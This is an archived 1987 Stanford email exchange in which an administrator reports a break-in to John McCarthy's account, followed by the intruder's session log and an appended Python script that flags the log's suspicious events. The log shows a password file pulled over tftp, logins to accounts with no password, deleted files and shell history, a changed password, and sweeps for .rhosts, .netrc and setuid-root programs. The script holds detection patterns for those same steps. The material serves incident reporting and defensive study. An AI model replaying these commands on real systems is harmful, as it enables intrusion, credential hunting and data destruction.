perm filename BREAKI[W87,JMC] blob sn#835311 filedate 1987-03-01 generic text, type C, neo UTF8
∂01-Mar-87  1307	HANSEN@Sierra.Stanford.EDU 	Breakin to your account on ibmrtpc1. 
Received: from SIERRA.STANFORD.EDU by SAIL.STANFORD.EDU with TCP; 1 Mar 87  13:07:32 PST
Date: Sun 1 Mar 87 13:05:03-PST
From: Stephen Hansen <Hansen@Sierra.Stanford.EDU>
Subject: Breakin to your account on ibmrtpc1.
To: jmc@Sail.Stanford.EDU
Message-ID: <12282987415.17.HANSEN@Sierra.Stanford.EDU>

I am sorry for the delay in getting this to you but the host table on
Talbots (my preferred address) doesn't know about sail's new address
and the MAILER-DAEMON just now bounced it back to me.  I also tried
calling you Friday but there was no answer.

A cracker that I have been monitoring accessed your account on ibmrtpc1
just before midnight on the 26th.  The police are already on this case
as this person has been doing damage to several other on campus systems.
I am sending you an extract of my log file that shows just what was done
on the rt.

This person does have a reasonable amount of competence when it comes
to building trapdoors into a system so I would suggest that you survey
your file system carefully for any modifications.  I can only monitor
this person's activities on a few systems so I can't tell if he came in
at other times directly from a tip or other system.  Last night he was
using tip-mjhe line 15.

There is an investigation in progress and I would appreciate it if you
kept this information as confidential as possible.

If you have any questions please call me at x3-1058.

Stephen Hansen

ps.  Considering the delay in getting this information to you please
     feel free to call me at home (493-2095) if you think it necessary.

-------

∂01-Mar-87  1308	HANSEN@Sierra.Stanford.EDU 	Log of breakin on ibmrtpc1 
Received: from SIERRA.STANFORD.EDU by SAIL.STANFORD.EDU with TCP; 1 Mar 87  13:07:59 PST
Date: Sun 1 Mar 87 13:05:30-PST
From: Stephen Hansen <Hansen@Sierra.Stanford.EDU>
Subject: Log of breakin on ibmrtpc1
To: jmc@Sail.Stanford.EDU
Message-ID: <12282987496.17.HANSEN@Sierra.Stanford.EDU>

tftp> c ibmrtpc1
tftp> get /etc/passwd p
Received 1196 bytes in 5 seconds.
tftp> q
%grep :: p
shutdown::0:0:System killer:/:/usr/local/etc/shutdown
les::10:10:Les Earnest:/usr/les:/bin/csh
jmc::11:10:John McCarthy:/usr/jmc:/bin/csh
clt::13:10:Carolyn Talcott:/usr/clt:/bin/csh
test::99:31:DTN test login:/:/usr/ucb/yes
%finger les@ibmrtpc1
[ibmrtpc1] connect: Connection refused
%rusers ibmrtpc1
↑C%telnet ibmrtpc1
Trying 36.8.0.111 ...
Connected to ibmrtpc1.
Escape character is '↑]'.


4.3 BSD UNIX (ibmrtpc1)

login: jmc
Last login: Fri Sep 12 00:19:54 from su-ai.arpa
4.2 BSD UNIX (GENERIC) #2: Mon Sep 22 14:57:20 PDT 1986

IBM Academic Information Systems 4.2
5799-CGZ (C) Copyright IBM Corporation 1986
All Rights Reserved
Licensed Materials - Property of IBM
% w
w: No namelist
% who
air      console Feb  2 21:29
jmc      ttyp0   Feb  4 06:45   (36.14.0.11)
% finger air
Login name: air                         In real life: Arkady Rabinov
Directory: /user/air                    Shell: /bin/csh
On since Feb  2 21:29:02 on console     8 hours 31 minutes Idle Time
No Plan.
% ls -a
.         .cshrc    .login    alt.c     alt.h     alt.o     test
..        .history  alt       alt.data  alt.lsp   mbox
% mail
No mail for jmc
% stty 
new tty, speed 38400 baud; -tabs crt 
% stty erase "↑h" intr "↑c" kil "↑u"
unknown mode: kil
unknown mode: ↑u
% stty kill "↑u"
% stty
new tty, speed 38400 baud; -tabs crt 
% ls -al
total 15
drwxr-xr-x  2 jmc           512 May 21  1986 .
drwxrwxr-x 37 root         1024 Feb  3 00:03 ..
-rw-r--r--  1 jmc           130 Feb 24  1986 .cshrc
-rwxr-xr-x  1 jmc           407 Sep 12 00:20 .history
-rw-r--r--  1 jmc           104 May  1  1986 .login
-rw-r--r--  1 jmc            82 May  3  1986 alt
-rw-r--r--  1 jmc           743 May  3  1986 alt.c
-rw-r--r--  1 jmc            20 May  3  1986 alt.data
-rw-r--r--  1 jmc           135 May  3  1986 alt.h
-rw-r--r--  1 jmc            82 May  3  1986 alt.lsp
-rw-r--r--  1 jmc          2314 May  3  1986 alt.o
-rw-------  1 jmc           938 Mar 26  1986 mbox
-rw-r--r--  1 jmc             5 Apr  3  1986 test
% cat .cshrc
set path = ( /etc /usr/ucb /bin /usr/bin . /usr/local /usr/ibmtools /usr/new )
set history = 50
set savehist = 50
alias j jobs -l
% cat .login

umask 2

alias k logout
stty new crt erase ↑H kill ↑U intr ↑C -nl
alias kcl /usr/kcl/okcl/unixport/kcl
% 
% cat .profile
.profile: No such file or directory
% cat .logout
.logout: No such file or directory
% file *
alt:    ascii text
alt.c:  c program text
alt.data:       ascii text
alt.h:  ascii text
alt.lsp:        ascii text
alt.o:  executable not stripped
mbox:   ascii text
test:   ascii text
% more test
test
% cat test
test
% rm test
% more mbox
>From greep Wed Mar 26 23:44:56 1986
Received: by  with Sendmail; Wed, 26 Mar 86 23:44:52 pst
Date: Wed, 26 Mar 86 23:44:52 pst
From: Steven Tepper <greep>
To: jmc
Status: RO

You can type "ps xg" to get the process id of your shell (not the
one you're logged into now! -- check tye TTY number) and then
type "kill -9 nn" where nn is the process id.

>From JMC@SU-AI.ARPA Wed Mar 26 22:30:11 1986
Received: from SU-AI.ARPA (su-ai.arpa.ARPA) by ibmpcrt1 (4.12/4.7)
        id AA01379; Wed, 26 Mar 86 22:30:07 pst
Message-Id: <8603270630.AA01379@ibmpcrt1>
Date: 26 Mar 86  2229 PST
From: John McCarthy <JMC@SU-AI.ARPA>
To: jmc@IBMPCRT1
Status: RO

test


>From JMC@SU-AI.ARPA Wed Mar 26 13:21:30 1986
Received: from SU-AI.ARPA (su-ai.arpa.ARPA) by ibmpcrt1 (4.12/4.7)
        id AA00169; Wed, 26 Mar 86 13:21:26 pst
Message-Id: <8603262121.AA00169@ibmpcrt1>
Date: 26 Mar 86  1320 PST
From: John McCarthy <JMC@SU-AI.ARPA>
To: jmc@IBMPCRT1
Status: RO

test


% more alt
(defun alt (u) (if (or (null u) (null (cdr u))) u (cons (car u) (alt (cddr u)))))
% rm mbox
% ls
alt       alt.c     alt.data  alt.h     alt.lsp   alt.o
% rm *
% ls -a
.         ..        .cshrc    .history  .login
% cat .history
ls 
k 
cat .login 
cat foo 
cat > foo 
cat foo 
cat foo .login > foo1 
cat foo1 
cat > foo2 
cat .login foo2 > foo1 
cat foo1 
mv foo1 .login 
cat .login 
rm foo foo1 foo2 
k 
kcl 
kcl 
inger 
finger 
cat 
cat alt 
cat > alt 
cat alt 
kcl 
k 
kcl 
ls 
cat alt > alt.lsp 
ls 
kcl 
ls 
cat alt.c 
cat alt.o 
ls -ls 
cat alt.lsp 
cat alt.c 
k 
finger 
k 
finger 
k 
finger 
k 
kcl 
k 
finger 
k 
finger 
k 
k 
% ls -al
total 5
drwxr-xr-x  2 jmc           512 Feb  4 06:50 .
drwxrwxr-x 37 root         1024 Feb  3 00:03 ..
-rw-r--r--  1 jmc           130 Feb 24  1986 .cshrc
-rwxr-xr-x  1 jmc           407 Sep 12 00:20 .history
-rw-r--r--  1 jmc           104 May  1  1986 .login
% rm .history
% umask
2
% umask 0
% cat>a
test
%Dls -l a
-rw-rw-rw-  1 jmc             5 Feb  4 06:51 a
% umask 000
% cat>a
test
%Dls -l a
-rw-rw-rw-  1 jmc             5 Feb  4 06:52 a
% umask 77
% rm a
% ls -l /etc/passwd
-rw-r--r--  1 root         1196 Oct 20 22:54 /etc/passwd
% cat /etc/group
wheel:*:0:root
daemon:*:1:daemon
staff:*:10:root,ibmacis
operator:*:28:root
guest:*:31:root
kcl:*:32:dan
fol:*:33:dan,kcl
ibmacis:*:100:
% ls /etc/phones
/etc/phones not found
% ls -lt/etc/hosts
-rw-r--r--  1 root       213491 Aug 26 17:18 /etc/hosts
% ls -l /etc/hosts.equiv
-rw-r--r--  1 root            0 Mar 17  1986 /etc/hosts.equiv
% uname
uname: Command not found.
% uuname
uuname: Command not found.
% ls -a /usr/adm
.            acct-pp      lpd-errs     newsyslog    savacct      wtmp
..           lastlog      messages     rlpacct      shutdownlog
acct         lpacct       msgbuf       rlpd-errs    usracct
% ls -l /usr/adm/acct-pp
-rw-r--r--  1 root            0 Mar 17  1986 /usr/adm/acct-pp
% ls -l /etcvwtmp
/etcvwtmp not found
% ls -l /etc/wtmp
/etc/wtmp not found
% ls -l /usr/adm/wtmp
-rw-rw-rw-  1 root        77400 Feb  4 06:45 /usr/adm/wtmp
% file /usr/adm/wtmp
/usr/adm/wtmp:  data
% ls -a /
.                       dev                     march31
..                      etc                     mnt
.cshrc                  install_done            modified.since.march31
.history                install_notes           nfaccess
.login                  install_sendapar        sys
.profile                install_ttys            tmp
.rhosts                 install_uucp            user
backroot                lib                     usr
bin                     lost+found              vmunix.std
boot                    make.clean
% cd /
% cat .cshrc
set path = ( /etc /usr/ucb /bin /usr/bin . /usr/local /usr/ibmtools /usr/new )
set history = 50
set savehist = 50
alias j jobs -l
% cat .login
umask 2
stty new crt erase ↑H kill ↑U intr ↑C -nl
echo "Don't login as root, use su"
% cat .profile
stty new crt erase \↑H kill \↑U intr \↑C -nl
echo 'erase ↑H, kill ↑U, intr ↑C'
PS1=`hostname`'# '; export PS1
PATH=/etc:/usr/ucb:/bin:/usr/bin:/usr/local:/usr/ibmtools:/usr/new
export PATH
HOME=/
export HOME
TERM=${TERM-ibmconsole}
export TERM
% cat .history
rm x* 
exit 
pwd 
gnu 
cd /user/gnuemacs/src 
gnu 
exit 
chmod a+w swapgeneric.c 
exit 
mkdir safe 
mv vmunix safe 
ls .. -a 
ls -a .. 
ls -l .. 
chown air /sys/IBMRTPC1 
exit 
pwd 
chown air * 
exit 
chown air ../h/* 
exit 
pwd 
cd ../cacons 
chown air * 
exit 
pwd 
rm -r andrew 
exit 
chown air vm* 
ls -l vm* 
exit 
pwd 
rm * 
ls 
exit 
rm GENERIC/* 
ls -l GENERIC/tmp 
rm GENERIC/tmp/* 
ls 
rmdir GENERIC 
rmdir GENERIC/tmp 
rmdir GENERIC 
du 
rmdir ca 
ls -l 
rm * 
ls -l h 
rm h/* 
rmdir h 
exit 
% finger root
Login name: root                        In real life: Charlie Root
Directory: /                            Shell: /bin/csh
Last login Mon Feb  2 16:52 on console
No Plan.
% cat .rhosts
% ls /usr/lib/uucp
L-devices    L.cmds       SEQF         uucico       uucp
L-dialcodes  L.sys        USERFILE     uuclean      uuxqt
% cd /usr/lib/uucp
% ls -l L.sys
-rw-r-----  1 uucp          131 Sep 30  1985 L.sys
% cd /usr/lib
% ls -l cron*
-rwxr-xr-x  1 root          594 May 13  1986 crontab
-r--r--r--  1 root          661 May 13  1986 crontab.orig
% cat crontab
30 4 * * * /etc/sa -s > /dev/null
0 4 * * * calendar -
15 4 * * * find /usr/preserve -mtime +7 -a -exec rm -f {} \;
20 4 * * * find /usr/msgs -mtime +21 -a ! -perm 444 -a ! -name bounds -a -exec rm -f {} \;
30 4 * * * /usr/lib/uucp/cleanlog
40 4 * * * find / '(' -name '#*' -o -name '*.CKP' ')' -a -atime +3 -a -exec rm -f {} ';'
0,15,30,45 * * * * /usr/lib/atrun
0,10,20,30,40,50 * * * * /etc/dmesg - >>/usr/adm/messages
0 0 * * * su daemon < /usr/local/lib/uucp.daily
0 5,12,18 * * * su daemon < /usr/local/lib/uucp.6hours
0 0 * * * /usr/local/lib/news/expire
5 4 * * * sh /usr/adm/newsyslog
% ls -l /usr/adm/newsyslog
-rwxr-xr-x  1 daemon        279 Mar 16  1986 /usr/adm/newsyslog
% file /usr/adm/newsyslog
/usr/adm/newsyslog:     commands text
% cat /usr/adm/newsyslog
cd /usr/spool/mqueue
rm syslog.7
mv syslog.6  syslog.7
mv syslog.5  syslog.6
mv syslog.4  syslog.5
mv syslog.3  syslog.4
mv syslog.2  syslog.3
mv syslog.1  syslog.2
mv syslog.0  syslog.1
mv syslog    syslog.0
cp /dev/null syslog
chmod 666    syslog
kill -1 `cat /etc/syslog.pid`
% pwd
/usr/lib
% cd uucp
% ls cleanlog
cleanlog not found
% ls -l ../cleanlog
../cleanlog not found
% cd /usr/spool
% ls
at        lpd       lplpd     mqueue    ppd       rppd
imlpd     lpd.lock  mail      notes     rlpd      rwho
% cd mail
% ls
clt     kcl     khanna  yoram
% ls -l
total 2
-rw-------  1 clt          1170 Sep 24 13:01 clt
-rw-------  1 kcl             0 Sep 25 16:29 kcl
-rw-------  1 khanna          0 Jul 14  1986 khanna
-rw-------  1 yoram           0 Oct  4 00:05 yoram
% cd /
% pwd
/usr/jmc
% cd /usr
% ls
Adds        edu         ibmrtpc1    les         new         stanford
adm         games       ibmtools    lib         preserve    sys
bin         greep       include     local       pub         tmp
clt         grt.bug     jmc         lost+found  skel        ucb
dan         guest       kcl         man         spool       weening
dict        hosts       khanna      mdec        src
doc         ibm         ldir        msgs        stand
% finger les
Login name: les                         In real life: Les Earnest
Directory: /usr/les                     Shell: /bin/csh
Last login Wed Oct 15 12:07 on ttyp0
No Plan.
% finger clt
Login name: clt                         In real life: Carolyn Talcott
Directory: /usr/clt                     Shell: /bin/csh
Last login Wed Sep 24 12:42 on ttyp0
No Plan.
% ls /user
air         dan         fol         greep       lost+found  usr
cmu         edward      gnuemacs    kcl         src         yoram
% grep clt /etc/passwd
clt::13:10:Carolyn Talcott:/usr/clt:/bin/csh
% grep les /etc/passwd
les::10:10:Les Earnest:/usr/les:/bin/csh
% grep jmc /etc/passwd
jmc::11:10:John McCarthy:/usr/jmc:/bin/csh
% passwd
Changing password for jmc
New password:
Retype new password:
% who
air      console Feb  2 21:29
jmc      ttyp0   Feb  4 06:45   (36.14.0.11)
% rusers
rusers: Command not found.
% telnet
telnet> q
% rwho
% find / -name '.netrc' -print > netrc &
[1] 2555
% pwd
/usr
% cd
% ls -a
% ls /usr/netrc
/usr/netrc
% kill 2555
% rm /usr/netrc
[1]  + Terminated           find / -name .netrc -print > netrc
% find / -name '.netrc' -print > netrc &
[1] 2562
% find / -name '.rhosts' -print > rhosts &
[2] 2565
% find / -perm -4000 -user root -print > perm &
[3] 2568
% ps
/vmunix: No namelist
% ls /tmp
lost+found  sys
% finger
Login       Name              TTY Idle    When            Office
air      Arkady Rabinov        co 8:51 Mon 21:29 
jmc      John McCarthy         p0      Wed 06:45 
% cu
usage: cu telno [-t] [-s speed] [-a acu] [-l line] [-#]
% ls
netrc   perm    rhosts
% ls -l
total 0
-rw-------  1 jmc             0 Feb  4 07:04 netrc
-rw-------  1 jmc             0 Feb  4 07:05 perm
-rw-------  1 jmc             0 Feb  4 07:05 rhosts
% finger jmc@portia
Login name: jmc@portia                  In real life: ???
% telnet portia 79
Trying...
Connected to portia.
Escape character is '↑]'.
jmc
Login name: jmc                         In real life: ???
Connection closed by foreign host.
% telnet portia 79
Trying...
Connected to portia.
Escape character is '↑]'.
les
Login name: les                         In real life: ???
Connection closed by foreign host.
[1]    Done                 find / -name .netrc -print > netrc
% ls -l
total 1
-rw-------  1 jmc             0 Feb  4 07:04 netrc
-rw-------  1 jmc             0 Feb  4 07:05 perm
-rw-------  1 jmc           107 Feb  4 07:08 rhosts
[2]  - Done                 find / -name .rhosts -print > rhosts
% tftp portia
tftp> get /etc/passwd p
Error code 2: Access violation
tftp> q
[3]  + Done                 find / -perm -4000 -user root -print > perm
% ls -l
total 2
-rw-------  1 jmc             0 Feb  4 07:04 netrc
-rw-------  1 jmc             0 Feb  4 07:09 p
-rw-------  1 jmc           517 Feb  4 07:09 perm
-rw-------  1 jmc           107 Feb  4 07:08 rhosts
% rm netrc p
% cat rhosts
/usr/src/root/.rhosts
/usr/les/.rhosts
/usr/greep/.rhosts
/usr/ibmrtpc1/.rhosts
/user/air/.rhosts
/.rhosts
% cat perm
/bin/chgrp
/bin/df
/bin/login
/bin/mail
/bin/passwd
/bin/su
/usr/lib/ex3.7recover
/usr/lib/ex3.7preserve
/usr/lib/sendmail
/usr/lib/lpd
/usr/ucb/chfn
/usr/ucb/chsh
/usr/ucb/rcp
/usr/ucb/rsh
/usr/ucb/quota
/usr/ucb/lpr
/usr/ucb/lpq
/usr/ucb/lprm
/usr/ucb/rlogin
/usr/ucb/rdist
/usr/ldir/etc/rrestore
/user/usr/ucb/chfn
/user/usr/ucb/chsh
/user/usr/ucb/rcp
/user/usr/ucb/rsh
/user/usr/ucb/quota
/user/usr/ucb/lpr
/user/usr/ucb/lpq
/user/usr/ucb/lprm
/user/usr/ucb/rlogin
/user/usr/ucb/rdist
/user/usr/ldir/etc/rrestore
% man rdist

RDIST(1)            UNIX Programmer's Manual             RDIST(1)

NAME
     rdist - remote file distribution program

SYNOPSIS
     rdist [ -DnqbRvwyhi ] [ -f distfile ] [  -d  var=value  ]  [
     name ... ]

     rdist [ -DnqbRvwyhi ] -c name ... host[.login][:dest]

DESCRIPTION
     Rdist is a program to maintain  identical  copies  of  files
     over  multiple  hosts.  It preserves the owner, group, mode,
     and mtime of files if possible and can update programs  that
     are executing.  Rdist reads commands from distfile to direct
     the updating of files and/or directories.   If  distfile  is
     `-',  the  standard  input  is  used.   If  no  -f option is
     present, the file `distfile' is used for input.  If no names
     are  specified on the command line, rdist will update all of
     the files and directories listed  in  distfile.   Otherwise,

% ls -l
total 2
-rw-------  1 jmc           517 Feb  4 07:09 perm
-rw-------  1 jmc           107 Feb  4 07:08 rhosts
% ls -al
total 6
drwxr-xr-x  2 jmc           512 Feb  4 07:10 .
drwxrwxr-x 37 root         1024 Feb  4 07:04 ..
-rw-r--r--  1 jmc           130 Feb 24  1986 .cshrc
-rw-r--r--  1 jmc           104 May  1  1986 .login
-rw-------  1 jmc           517 Feb  4 07:09 perm
-rw-------  1 jmc           107 Feb  4 07:08 rhosts
% tftp irisrt8c

irisrt8: unknown host
tftp> tftp> status
Not connected.
Mode: netascii Verbose: off Tracing: off
Rexmt-interval: 5 seconds, Max-timeout: 25 seconds
tftp> q
% rusers
rusers: Command not found.
% rwho cobra
% rlogin cobra
cobra: unknown host
% rlogin cobra.stanford.edu
cobra.stanford.edu: unknown host
% logout
Connection closed by foreign host.

-------
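A defender's triage check added here, not part of Hansen's correspondence or of the monitoring tool that produced the log: it runs a small rule set over a line-oriented transcript like the one above and flags the events that matter in it (the tftp pull of /etc/passwd, passwd entries with empty password fields, umask set to 0, the .rhosts/.netrc and setuid sweeps, the deletion of .history). The rules and the SAMPLE_SESSION excerpt are assumptions modelled on the log.

```python
import re

# Constructed excerpt modelled on the session log above (not the full log).
SAMPLE_SESSION = """\
tftp> get /etc/passwd p
%grep :: p
jmc::11:10:John McCarthy:/usr/jmc:/bin/csh
% umask 0
% umask 000
% passwd
% find / -name '.netrc' -print > netrc &
% find / -name '.rhosts' -print > rhosts &
% find / -perm -4000 -user root -print > perm &
% rm .history
% ls -l
"""

# Each rule: (regex over one transcript line, reason a reviewer should look at it).
# Assumed rule set; extend it with whatever your own session captures show.
RULES = [
    (r"^tftp> get /etc/passwd\b", "password file fetched over unauthenticated tftp"),
    (r"^[^:\s]+::\d+:\d+:", "passwd entry with an empty password field"),
    (r"^% umask 0+$", "umask set to 0: new files become world-writable"),
    (r"^% passwd$", "account password changed from inside the session"),
    (r"^% find / .*-name '?\.(rhosts|netrc)'?", "sweep for trust/credential files"),
    (r"^% find / .*-perm -4000\b", "sweep for setuid-root programs"),
    (r"^% rm \.history$", "shell history removed (anti-forensics)"),
]

def audit_session(transcript):
    """Return [(line_no, reason, line)] for every transcript line matching a rule."""
    findings = []
    for line_no, line in enumerate(transcript.splitlines(), 1):
        for pattern, reason in RULES:
            if re.search(pattern, line):
                findings.append((line_no, reason, line))
    return findings

def summarize(findings):
    """Count findings per reason so the triage report stays short."""
    counts = {}
    for _, reason, _ in findings:
        counts[reason] = counts.get(reason, 0) + 1
    return counts

if __name__ == "__main__":
    for line_no, reason, line in audit_session(SAMPLE_SESSION):
        print(f"line {line_no}: {reason}: {line}")
```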